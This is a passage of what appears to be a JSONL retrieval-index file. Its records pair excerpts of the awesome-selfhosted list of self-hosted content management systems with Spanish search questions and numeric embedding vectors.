-0.07324, -0.0058, -0.01947, -0.0472, -0.01931, 0.01235, -0.17704, 0.0477, 0.03897, 0.0049, -0.03562, 0.02754, -0.07877, 0.10938, 0.02907, 0.12872, 0.15169, -0.10795, 0.11185, -0.0419, -0.0241, 0.18327, -0.10409, -0.02339, -0.03304, -0.03262, 0.05844, 0.07824, -0.04443, 0.01989, -0.06563, 0.09148, 0.06716, 0.02828, 0.053, -0.13095, -0.08753, 0.0948, -0.09744, 0.15661, -0.07711, -0.03477, -0.09686, 0.06461, -0.05965, 0.03684, 0.00269, 0.07819, 0.11752, -0.10279, -0.07428, -0.18299, -0.05727, 0.08564, -0.00552, 0.09408, -0.04231, -0.00989, 0.09556, -0.02139, 0.02709, 0.00162, -0.09051, -0.07943, 0.00913, -0.03096, -0.05586, 0.09535, 0.09323, 0.05985, 0.03155, 0.06252, -0.09008, -0.05257, 0.018, -0.05822, -0.06113, 0.08143, -0.00427, 0.07019, -0.06401, -0.03914, 0.0563, 0.04173, -0.04132, 0.00437, -0.10798, -0.10025, -0.0192, 0.0514, 0.03197, 0.02058, -0.05025, -0.04355, 0.00184, -0.07366, -0.0442, -0.02275, 0.0035, -0.00851, 0.01254, -0.03012, 0.0709, 0.07325, 0.03198, 0.11303, 0.02284, -0.03716, 0.11232, -0.05296, -0.13691, 0.00175, -0.0913, 0.06749, 0.02838, 0.0587, 0.0262, -0.03693, 0.02706, -0.06528, 0.0425, -0.02702, 0.08101, 0.00906, 0.00046, -0.01541, 0.00682, 0.06643, -0.02619, -0.01626, -0.03013, 0.07527, -0.06354, 0.0465, 0.00629, -0.01701, -0.00041, 0.1496, -0.03224, -0.05499, -0.02124, 0.02063, 0.00241, -0.07877, -0.03622, -0.01011, -0.00465, -0.00852, 0.01335, 0.04891, 0.03815, -0.08871, 0.09118, 0.00348, -0.00784, -0.08057, 0.03041, -0.04371, 0.00513, 0.02643, -0.09493, 0.02834, 0.00061, 0.01426, -0.00532, 0.07098, -0.00851, 0.06027, -0.0521, -0.01389, -0.00762, -0.08688, -0.02044, 0.01097, -0.0049, -0.08174, 0.02111, 0.01367, -0.05597, -0.04049, -0.07959, 0.03479, 0.00029, -0.00756, -0.01726, 0.05801, 0.03785, 0.04773, 0.04952, 0.01696, -0.03743, 0.03093, -0.04376, -0.02608, -0.05835, -0.03535, 0.06556, 0.04063, 0.02033, -0.00227, 0.08104, 0.00293, -0.03057, 0.0103, 0.01214, -0.00272, -0.03226, 0.00877, -0.03842, 0.03617, -0.03492, 0.02105, 0.02499, -0.08666, -0.00188, 0.01292, 0.02077, 0.02181, 0.07976, 0.06742, -0.02979, 0.01253, -0.02595, -0.02776, -0.07418, -0.01977, -0.04177, -0.01793, -0.03964, 0.05395, -0.02128, 0.01399, -0.00937, 0.02794]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": "como puedo montar un sistema para compartir y colaborar en documentos sin instalar bases de datos complejas?", "v": [0.07002, 0.17971, -0.2075, -0.22132, -0.0182, -0.14279, 0.05169, -0.02063, -0.22708, -0.06964, -0.1642, -0.06711, -0.01621, -0.13053, 0.05547, -0.00592, 0.0727, -0.16156, -0.05331, -0.09839, 0.01977, -0.07147, -0.01487, -0.01505, -0.0463, 0.0252, -0.01885, -0.11817, -0.10084, 0.05262, 0.03727, 0.02517, -0.02889, 0.06824, -0.05738, -0.0058, -0.03619, -0.01178, -0.01098, -0.10544, -0.05393, -0.0247, -0.06037, 0.12221, -0.01304, 0.01632, -0.08477, -0.01155, 0.05438, -0.05902, -0.03634, 7e-05, -0.07268, -0.07581, -0.07943, -0.17469, 0.14612, -0.11067, 0.04485, 0.00479, -0.08929, 0.09697, -0.04458, 0.07851, 0.04688, 0.0011, -0.01049, 0.00283, -0.11163, 0.11495, -0.00945, 0.06212, 0.03443, -0.09533, -0.06752, 0.00248, 0.03348, -0.08306, -0.00241, 0.07613, 0.04416, 0.01719, -0.01456, 0.12862, 0.00822, -0.04753, 0.05226, -0.03662, 0.04011, -0.00972, 0.06813, -0.00358, 0.0293, 0.04374, 0.0811, -0.05833, 0.03088, 0.05696, -0.02398, 0.02157, -0.08776, 0.00862, 0.0387, 0.04368, -0.06134, -0.02078, 0.04159, -0.01912, 0.02335, -0.06674, -0.03429, 0.03546, -0.03169, 0.03343, -0.0388, -0.10238, 0.04011, 0.05908, -0.08294, -0.00148, 0.01846, 0.02148, 0.03706, -0.00138, 0.07694, -0.06186, 0.00534, 0.15062, 0.02879, 0.08656, -0.02346, -0.03777, -0.05041, 0.03121, 0.04427, 0.02945, -0.02614, -0.03997, -0.06132, -0.0932, 0.02555, 0.01917, -0.0571, -0.10448, 0.0243, 0.0575, 0.04544, -0.00585, -0.03827, -0.05812, 0.00712, 0.04994, 0.02777, 0.02145, -0.07909, 0.00434, 0.11759, -0.02895, -0.0277, -0.02332, 0.03094, 0.08573, -0.03338, 0.00029, -0.01554, -0.01313, -0.04806, -0.02158, 0.1074, 0.03397, -0.02563, 0.05883, 0.05436, -0.10087, 0.0693, -0.04966, -0.03816, -0.09394, -0.00789, 0.02286, -0.06772, 0.03153, 0.04607, 0.04542, -0.00138, -0.028, 0.02707, -0.03643, 0.01822, -0.02924, 0.07936, 0.06423, -0.01631, 0.00916, 0.0461, -0.07299, -0.08786, -0.02789, 0.01553, 0.02072, -0.05482, 0.07117, -0.02037, -0.03201, 0.03413, 0.01567, -0.04842, 0.03729, 0.06317, 0.02027, 0.02318, -0.01654, 0.00693, -0.06319, -0.08696, -0.01508, 0.00429, 0.01652, -0.00206, -0.01608, -0.0149, 0.02917, 0.07554, -0.04379, 0.0429, -0.02015, 0.04951, 0.05351, 0.02072, -0.04175, -0.03241, 0.00844, 0.00202, -0.00137, 0.04109, 0.01092, -0.02397, -0.01567, -0.02073, -0.04993, 0.04767, 0.07466, 0.00883, -0.09216, -0.05097, -0.03803, -0.05841, 0.04361, 0.02917, -0.11395, -0.03329, 0.00929, 0.05985, -0.05827, -0.02085, -0.04183]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "que programa puedo usar para crear sitios web profesionales sin pagar licencias?", "v": [0.06521, 0.04623, -0.17458, -0.18979, 0.07563, -0.17357, 0.0079, -0.12122, -0.19726, -0.11362, 0.03168, -0.13348, 0.03983, -0.14449, 0.03957, 0.0386, 0.03257, -0.11393, 0.11677, -0.01293, 0.02849, 0.02158, -0.02365, -0.03521, -0.04906, -0.04736, 0.14624, -0.18223, -0.14553, 0.1298, -0.02153, 0.09272, 0.05684, -0.02941, 0.0379, -0.00233, 0.03458, 0.05317, 0.07343, 0.01904, 0.08056, 0.0373, -0.04198, 0.02839, -0.03995, -0.01392, -0.03365, -0.05362, -0.00776, -0.03921, -0.01335, -0.00872, -0.10859, -0.08912, 0.09701, -0.10722, 0.09045, -0.12431, -0.03223, -0.00697, -0.04931, 0.08715, 0.01013, 0.03913, -0.0284, 0.02784, 0.13766, 0.0706, -0.01206, -0.01946, -0.06314, -0.01768, 0.09891, -0.02955, 0.0636, -0.00303, -0.06515, -0.11218, 0.04915, 0.0084, 0.03512, 0.00131, 0.00451, -0.02626, -0.11744, 0.0125, -0.0107, -0.06904, 0.05173, -0.04693, 0.05179, 0.0973, -0.00738, 0.03833, 0.02185, -0.12269, 0.13247, 0.00918, 0.01832, 0.04334, -0.01535, 0.00683, -0.05919, 0.02624, -0.00776, 0.11474, 0.15263, -0.08923, -0.07618, 0.04271, -0.01115, 0.04103, -0.08583, -0.05084, -0.08163, 0.02934, 0.04373, -0.01813, 0.05821, 0.00645, -0.01483, -0.02233, -0.02548, 0.00958, 0.07451, 0.03442, 0.00114, 0.18993, -0.14488, -0.00983, -0.01999, -0.0297, -0.04945, 0.01004, -0.03459, 0.02653, 0.05213, 0.0152, -0.04766, -0.01201, 0.01394, 0.0311, -0.04133, 0.0272, 0.01165, 0.01322, -0.08854, -0.1118, -0.08605, -0.02143, -0.02936, 0.02569, -0.04946, 0.0442, -0.12165, 0.03516, -0.02538, -0.02187, -0.02378, 0.0455, -0.0111, 0.08966, 0.00276, -0.04301, 0.03733, 0.03491, -0.04971, 0.07773, 0.07576, 0.107, 0.00412, 0.06082, 0.00783, -0.07652, 0.08399, 0.02337, -0.04328, -0.07255, 0.01892, -0.03483, -0.06347, -0.01972, -0.04976, -0.01888, -0.02998, 0.03748, 0.03336, 0.03351, -0.01898, 0.04885, -0.06467, 0.02511, 0.01534, -0.02887, 0.04246, -0.01371, -0.0074, -0.02258, 0.00017, -0.07272, -0.03426, -0.0194, -0.04061, -0.01487, 0.02842, -0.0081, -0.02911, 0.0143, -0.00088, 0.05282, -0.05107, -0.08266, 0.00409, -0.04853, -0.01804, -0.03346, 0.01762, -0.01778, -0.04885, 0.03206, 0.06906, -0.00983, -0.05451, 0.05518, 0.06534, -0.04565, 0.03381, 0.03351, 0.03369, 0.02278, -0.02728, -0.00852, -0.06854, -0.04767, 0.03043, -0.00303, -0.0086, 0.00226, -0.05019, -0.01768, -0.0393, 0.06851, 0.0021, -0.02973, 0.00259, -0.04763, -0.07548, -0.04862, 0.01171, 0.00619, -0.03152, 0.05605, 0.0426, 0.0129, 0.03347, 0.04618]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "con que herramienta puedo gestionar el contenido de mi aplicaciΓ³n web usando JSON y tener APIs automΓ‘ticas?", "v": [-0.02973, 0.12683, -0.10072, -0.25056, 0.02482, -0.02303, -0.05646, -0.0514, -0.13843, 0.0336, -0.09952, -0.11368, -0.03095, 0.00341, 0.08416, 0.03114, 0.13912, -0.18976, -0.01018, 0.12954, -0.01682, 0.06632, -0.13654, -0.07529, -0.03675, 0.0973, 0.15511, -0.07236, -0.20182, -0.03417, -0.02139, -0.00736, 0.0799, -0.0254, -0.13107, -0.06305, -0.11438, 0.12067, -0.02857, 0.07573, 0.05036, -0.00109, -0.15827, 0.0204, 0.00863, 0.17422, 0.08436, -0.03671, -0.06424, 0.00043, -0.04003, -0.15309, -0.14052, 0.03836, -0.04257, -0.08105, 0.18541, -0.127, 0.04787, -0.07021, -0.06646, -0.00087, -0.09418, 0.02469, 0.00523, -0.03681, 0.09686, 0.00649, -0.074, 0.15865, -0.0135, -0.02275, 0.01138, 0.01571, 0.09342, 0.01628, 0.01853, 0.04355, 0.04402, 0.0425, 0.00621, -0.02365, -0.03931, 0.05085, 0.00468, -0.05334, -0.01528, -0.06243, 0.01502, -0.0635, -0.03236, -0.08845, 0.01294, -0.00028, 0.02839, -0.02846, 0.04746, -0.02278, 0.03661, -0.00353, 0.07897, -0.06161, -0.0955, 0.03753, 0.02493, 0.03796, 0.08055, -0.09586, -0.03617, -0.04182, 0.05138, 0.01239, -0.04722, -0.03715, -0.01366, 0.10203, -0.02451, -0.06941, 8e-05, -0.07793, -0.00492, -0.03819, 0.00042, -0.03579, 0.05298, 0.01557, -0.03235, 0.1439, -0.02857, -0.03227, -0.01141, -0.06927, -0.08104, 0.03451, 0.02325, 0.08543, 0.04423, -0.04536, -0.02376, -0.02292, -0.09189, 0.00921, -0.05642, -0.04443, 0.09762, -0.06173, 0.01264, -0.05057, 0.00815, 0.02337, 0.02147, -0.15241, -0.01824, 0.03929, -0.05299, 0.00525, -0.03407, -0.02832, -0.06906, 0.01624, -0.05515, -0.01073, -0.02153, 0.06551, 0.01435, 0.02246, 0.0259, -0.01216, 0.06227, 0.0471, 0.02471, 0.07934, 0.01857, -0.03878, 0.03578, -0.03764, -0.02476, 0.0178, 0.02025, -0.08504, -0.04985, -0.0596, -0.00867, 0.00029, 0.00963, -0.04379, -0.01122, -0.01109, -0.00816, -0.00198, -0.02593, 0.07674, 0.03253, -0.02004, 0.07849, -0.01381, -0.03135, -0.05122, -0.03098, 0.00034, -0.06948, -0.01454, 0.02306, -0.04788, -0.01635, 0.05935, -0.00438, 0.01653, -0.00133, 0.01293, 0.02475, 0.04403, 0.02741, -0.02673, -0.00324, -0.03936, 0.00936, 0.01533, -0.03971, -0.02593, 0.00054, 0.00483, 0.02336, -0.01384, 0.02335, 0.05733, 0.01647, 0.02666, 0.00656, 0.01531, -0.0166, 0.01286, -0.04501, -0.0342, 0.05239, -0.04704, 0.03018, -0.02975, -0.05298, -0.024, -0.02214, 0.02504, 0.03803, -0.02829, -0.05718, -0.06188, -0.05757, 0.01408, -0.02948, -0.05386, -0.04364, 0.01402, 0.07157, -0.02268, 0.01803, -0.00088]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "cual es una alternativa libre a Joomla si trabajo en un laboratorio y necesito registrar experimentos con validez legal?", "v": [0.09903, -0.03252, -0.23155, -0.14705, -0.06255, -0.06202, 0.03494, 0.01282, -0.14063, -0.18833, -0.05763, -0.14895, 0.00985, 0.03225, 0.11073, 0.06268, 0.17841, -0.13006, -0.09326, -0.06742, -0.11212, -0.04073, -0.16731, -0.08226, -0.02626, -0.04567, 0.00697, -0.10996, 0.00275, 0.15894, -0.03754, 0.01027, 0.13746, -0.0693, 0.00287, 0.11017, 0.10237, -0.02015, -0.00148, 0.1443, 0.07191, 0.04448, -0.07564, 0.01887, -0.10803, 0.04476, -0.00291, -0.09337, -0.12392, 0.02317, -0.05098, 0.03776, -0.08804, -0.02486, 0.04028, 0.03018, 0.12986, -0.10718, 0.01419, -0.03259, -0.06962, -0.00132, 0.07229, 0.01617, -0.03313, -0.05317, 0.05397, -0.03172, -0.01033, 0.08614, 0.02369, 0.04143, -5e-05, -0.13039, -0.12873, -0.02981, -0.0791, -0.09089, -0.01226, -0.05751, -0.00989, 0.00929, 0.05954, 0.04795, -0.05846, -0.06494, 0.06711, -0.09882, -0.03375, 0.07905, 0.02694, 0.05219, 0.03665, 0.0107, 0.05324, -0.05934, 0.07679, 0.0147, 0.0388, -0.00601, 0.05736, 0.08186, -0.08295, 0.02511, -0.01128, 0.05479, 0.00316, 0.00247, -0.01869, 0.00839, -0.04291, 0.05496, -0.03996, -0.03816, -0.03829, 0.02608, -0.02564, -0.01773, 0.00663, -0.04524, -0.0088, -0.00306, -0.01537, -0.03981, 0.00308, -0.02139, 0.1133, 0.04011, 0.0009, 0.0162, 0.05057, 0.04198, -0.12676, -0.00722, 0.00598, 0.06403, 0.05184, -0.05684, -0.02053, 0.0314, -0.01689, 0.00322, 0.00223, -0.07663, -0.00823, 0.02948, -0.04034, -0.01113, -0.04603, -0.07576, -0.07215, -0.03302, -0.01645, 0.13852, -0.14466, 0.0448, 0.01008, -0.04067, -0.09144, 0.04546, 0.00573, 0.01878, -0.0162, -0.01136, -0.02181, 0.06375, 0.00566, -0.09016, 0.00221, 0.00201, -0.0149, 0.01873, 0.02222, -0.07276, 0.12944, 0.01265, -0.04483, -0.03399, 0.02155, -0.08245, 0.00737, 0.09236, 0.00806, -0.02478, 0.04211, 0.00853, 0.03321, 0.02099, 0.07066, 0.07476, 0.05753, 0.01859, -0.03523, -0.02698, 0.02265, 0.03095, 0.09187, -0.06499, 0.00954, 0.03132, -0.01726, -0.04222, -0.09916, -0.05551, -0.00787, -0.01179, -0.08447, 0.01749, 0.01225, -0.04231, 0.02923, -0.0122, 0.05309, -0.03552, -0.09434, 0.016, -0.00505, -0.02068, 0.00147, -0.03197, 0.03535, 0.04587, -0.01882, -0.0032, -0.00647, 0.05737, 0.05266, 0.05006, 0.00859, 0.0266, 0.03757, 0.04588, 0.00739, 0.03274, 0.05213, 0.03645, 0.04407, 0.02588, -0.01889, -0.04415, 0.01337, 0.12809, -0.03069, -0.03786, -0.03827, 0.00152, -0.0535, 0.0223, -0.01831, -0.03905, -0.00975, -0.00527, 0.04994, -0.08375, 0.03744, 0.00053]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "que programa puedo usar para gestionar y publicar contenido en mi sitio web sin pagar licencias?", "v": [0.00268, 0.0845, -0.1808, -0.24765, 0.08259, -0.17202, -0.04045, -0.09954, -0.19945, -0.11174, 0.01461, -0.19224, 0.06203, -0.06407, 0.00048, 0.05667, 0.06289, -0.14982, 0.08369, 0.00698, 0.04356, 0.04275, -0.00614, -0.07528, -0.05748, -0.02289, 0.17616, -0.1695, -0.10076, 0.06897, -0.04255, 0.04059, 0.09157, -0.05377, 0.02502, 0.04542, 0.05757, 0.05732, 0.10193, -0.02654, 0.05208, 0.06239, -0.05924, -0.00494, -0.05723, -0.05678, 0.07089, -0.08831, -0.01779, -0.05818, -0.00063, -0.05016, -0.12379, -0.01415, 0.04238, -0.01708, 0.09922, -0.14034, -0.00588, 0.00163, -0.04394, 0.08251, 0.03571, 0.03305, -0.0907, 0.02705, 0.13534, 0.12273, -0.06571, 0.07158, -0.00798, -0.03917, 0.09489, -0.017, 0.01846, -0.05094, -0.07044, -0.09778, 0.02784, 0.04735, -0.01913, -0.00912, 0.02659, 0.04933, -0.06508, -0.04515, -0.00609, -0.11099, 0.03591, -0.00119, 0.03005, 0.01882, -0.05566, -0.01241, -0.01071, -0.11697, 0.10388, -0.01327, 0.02018, -0.01933, -0.01758, 0.04991, -0.03992, 0.01057, -0.017, 0.09026, 0.10592, -0.11936, -0.03554, 0.04257, 0.01005, 0.02128, -0.12694, -0.04626, -0.08744, 0.09327, 0.01331, -0.01833, 0.07007, -0.01657, -0.06039, -0.01304, 0.00863, -0.03133, 0.15889, 0.04122, 0.03812, 0.16892, -0.11688, -0.00528, -0.03677, -0.03386, 0.03716, 0.02436, -0.03093, 0.0112, -0.00946, 0.00789, -0.06544, -0.04009, -0.03498, 0.01218, -0.05062, 0.04668, 0.03979, -0.02659, -0.07366, -0.08435, -0.08742, 0.00391, -0.00095, -0.05438, -0.05035, 0.03783, -0.06855, 0.00606, 0.00874, -0.02737, -0.03205, -0.00229, -0.01905, 0.07185, -0.02227, -0.01548, 0.06007, 0.05426, -0.05493, 0.03507, 0.03344, 0.0821, -0.00343, 0.08352, 0.03351, -0.0538, 0.0829, -0.02947, -0.05892, -0.07531, 0.00199, 0.01473, -0.04569, -0.00933, -0.01657, 0.01648, -0.04101, 0.05781, -0.01158, 0.07692, -0.04452, 0.02472, -0.01056, 0.01649, 0.02083, -0.01442, 0.06535, -0.01923, -0.04343, -0.00826, -0.00477, -0.03142, -0.03396, 0.00859, -0.0292, 0.00828, 0.00598, -0.0234, 0.00054, 0.0365, 0.02489, 0.02449, -0.03896, -0.0202, 0.00776, -0.02142, -0.06759, 0.00028, 0.0367, -0.01821, -0.04682, 0.03346, 0.06111, 6e-05, -0.00866, 0.02071, 0.0622, -0.04973, 0.04059, -0.00143, 0.02425, 0.04475, -0.06792, 0.01803, -0.07847, -0.01509, 0.02531, -0.0275, 0.00295, -0.01201, -0.06035, -0.03298, -0.03098, 0.05454, 0.06117, -0.00378, -0.01044, -0.02796, -0.09656, -0.01299, -0.02456, -0.00519, 0.00536, 0.02285, 0.03793, -0.01119, 0.02211, 0.04996]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "cual es una alternativa libre a WordPress si quiero crear un blog para una red de economΓ­a solidaria?", "v": [0.01815, 0.04114, -0.07125, -0.06727, -0.06496, -0.02759, -0.04771, -0.1059, -0.05616, -0.14564, -0.17703, -0.19878, 0.00342, -0.0823, 0.11027, -0.10496, 0.00693, 0.00272, 0.12696, -0.01157, -0.04973, -0.09964, -0.05898, -0.02247, 0.0715, -0.06559, -0.04434, 0.01773, -0.05974, 0.11276, 0.03848, -0.06088, -0.0041, 0.01109, -0.05742, 0.1529, 0.12912, 0.08929, 0.13974, -0.10806, 0.00387, -0.0846, 0.05153, 0.03541, -0.08737, 0.04761, 0.05352, -0.08687, 0.01031, 0.05198, -0.03909, -0.03365, -0.08616, 0.07895, 0.11671, 0.04409, 0.03846, -0.14859, -0.18925, 0.1027, -0.08449, 0.1718, -0.03, 0.00341, -0.10047, 0.02206, -0.05628, 0.10792, 0.05549, 0.15854, 0.05865, -0.07803, -0.06604, -0.12031, -0.04414, 0.09076, -0.00012, 0.03195, -0.0841, -0.02882, 0.05625, -0.01092, 0.01467, 0.04891, 0.03437, -0.04284, 0.07645, -0.009, -0.07682, 0.08626, 0.0773, 0.05228, 0.00594, -0.01944, -0.07085, 0.05226, -0.0011, -0.09395, -0.00041, 0.07023, -0.03233, -0.02423, -0.11429, -0.07617, 0.14052, 0.02015, 0.05829, 0.07485, -0.05886, -0.01956, 0.06696, 0.02759, 0.06668, 0.01018, 0.01712, 0.0144, 0.01088, 0.03772, 0.04793, -0.06024, 0.01167, 0.04247, -0.12767, -0.08713, 0.10506, 0.06518, 0.03523, 0.06273, -0.00235, 0.04168, 0.01285, -0.01187, -0.00224, -0.03151, -0.06496, 0.04502, 0.03818, -0.05233, -0.01162, -0.09071, 0.02521, -0.08731, -0.01156, -0.11325, -0.0205, 0.01266, -0.0052, -0.04239, -0.01757, -0.00211, -0.01306, 0.05649, -0.02143, -0.03246, -0.0675, -0.06598, 0.02472, 0.01971, -0.02422, 0.08465, -0.06211, -0.01708, 0.06943, 0.00748, -0.02083, -0.09965, -0.03165, 0.0071, -0.03669, -0.02735, -0.00373, 0.04895, -0.00504, -0.01344, 0.10742, -0.03363, 0.00212, -0.12152, 0.04412, -0.04453, 0.03985, -0.03254, -0.11926, 0.02842, -0.03669, -0.05313, 0.03941, 0.07632, -0.02172, 0.02994, -0.03076, -0.06944, -0.04513, -0.00128, 0.00968, 0.0375, -0.02723, -0.07432, 0.06258, -0.00927, -0.06135, -0.03672, 0.01598, -0.00545, -0.00915, 0.01469, -0.04197, 0.01134, 0.05139, 0.00884, 0.02434, -0.01819, -0.03124, -0.00901, 0.00695, -0.03122, -0.0094, 0.04514, 0.05962, -0.03794, 0.06221, 0.02277, 0.01695, 0.03449, 0.03067, 0.07487, -0.01361, 0.01611, -0.00422, -0.01323, -0.01716, -0.02143, -0.04616, 0.03634, -0.02705, -0.05144, 0.01657, 0.00601, -0.0135, 0.0406, 0.05859, 0.04254, -0.03042, -0.05899, 0.00037, 0.01046, -0.03174, 0.02052, -0.06466, -0.08521, -0.01069, 0.03397, -0.009, -0.02907, 0.00397, 0.04613]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "con que sistema puedo organizar colecciones complejas como las de museos o bibliotecas adheriendome a estΓ‘ndares Dublin Core?", "v": [0.27093, -0.00926, 0.00822, -0.03992, 0.04415, -0.09823, 0.0392, 0.03553, -0.16604, -0.13728, -0.14749, -0.06321, -0.1218, -0.1342, 0.02098, -0.10002, 0.05907, -0.17172, -0.01968, -0.07426, 0.0681, 